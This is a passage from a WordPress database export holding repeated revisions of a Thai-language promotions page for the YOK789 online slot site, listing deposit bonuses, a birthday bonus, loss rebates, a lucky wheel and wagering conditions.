https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp\" alt=\"Reward 10\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp\" alt=\"lucky wheel\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ <b>YOK789</b></strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\"><strong data-start=\"2414\" data-end=\"2445\"><b>YOK789</b> ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2026-02-25 02:20:49','2026-02-25 02:20:49','',27,'https://yok789ss.com/?p=342',0,'revision','',0),(343,3,'2026-02-25 02:20:50','2026-02-25 02:20:50','<h1>โปรโมชั่น YOK789 รวมโปรสล็อต สมัครรับโบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-pm-slice=\"0 0 []\">โปรโมชั่นสุดคุ้มจาก YOK789 เอาใจสายสล็อตโดยเฉพาะ กับโปรสมัครใหม่รับโบนัสฟรี 100% เพิ่มโอกาสสนุกได้มากขึ้นตั้งแต่เริ่มต้น ไม่ต้องฝากเยอะก็ร่วมลุ้นได้ พร้อมเงื่อนไขถอนไม่อั้น รองรับทั้งสมาชิกใหม่และสมาชิกปัจจุบัน รวมโปรสล็อตหลากหลายรูปแบบ ไม่ว่าจะเป็นโบนัสฝากแรก โบนัสฝากประจำ โปรโมชั่นคืนยอดเสีย และกิจกรรมพิเศษตามเทศกาล อัปเดตใหม่ตลอดเวลา ช่วยเพิ่มความคุ้มค่าในการเล่นมากยิ่งขึ้น ระบบฝากถอนอัตโนมัติ รวดเร็ว ปลอดภัย รองรับธนาคารชั้นนำ เหมาะสำหรับผู้ที่ต้องการความตื่นเต้นและความบันเทิงในรูปแบบออนไลน์ อย่างไรก็ตาม ควรเล่นอย่างมีสติ วางแผนการเงินทุกครั้ง และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อการเล่นอย่างรับผิดชอบและปลอดภัย</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp\" alt=\"20 get 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp\" alt=\"79 get 200\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp\" alt=\"Bonus free 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp\" alt=\"HBD Bonus\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp\" alt=\"Reward 10\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp\" alt=\"lucky wheel\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ <b>YOK789</b></strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\"><strong data-start=\"2414\" data-end=\"2445\"><b>YOK789</b> ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2026-02-25 02:20:50','2026-02-25 02:20:50','',27,'https://yok789ss.com/?p=343',0,'revision','',0),(344,3,'2026-02-25 02:20:50','2026-02-25 02:20:50','<h1>โปรโมชั่น YOK789 รวมโปรสล็อต สมัครรับโบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-pm-slice=\"0 0 []\">โปรโมชั่นสุดคุ้มจาก YOK789 เอาใจสายสล็อตโดยเฉพาะ กับโปรสมัครใหม่รับโบนัสฟรี 100% เพิ่มโอกาสสนุกได้มากขึ้นตั้งแต่เริ่มต้น ไม่ต้องฝากเยอะก็ร่วมลุ้นได้ พร้อมเงื่อนไขถอนไม่อั้น รองรับทั้งสมาชิกใหม่และสมาชิกปัจจุบัน รวมโปรสล็อตหลากหลายรูปแบบ ไม่ว่าจะเป็นโบนัสฝากแรก โบนัสฝากประจำ โปรโมชั่นคืนยอดเสีย และกิจกรรมพิเศษตามเทศกาล อัปเดตใหม่ตลอดเวลา ช่วยเพิ่มความคุ้มค่าในการเล่นมากยิ่งขึ้น ระบบฝากถอนอัตโนมัติ รวดเร็ว ปลอดภัย รองรับธนาคารชั้นนำ เหมาะสำหรับผู้ที่ต้องการความตื่นเต้นและความบันเทิงในรูปแบบออนไลน์ อย่างไรก็ตาม ควรเล่นอย่างมีสติ วางแผนการเงินทุกครั้ง และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อการเล่นอย่างรับผิดชอบและปลอดภัย</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp\" alt=\"20 get 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-1024x427.webp 1024w, 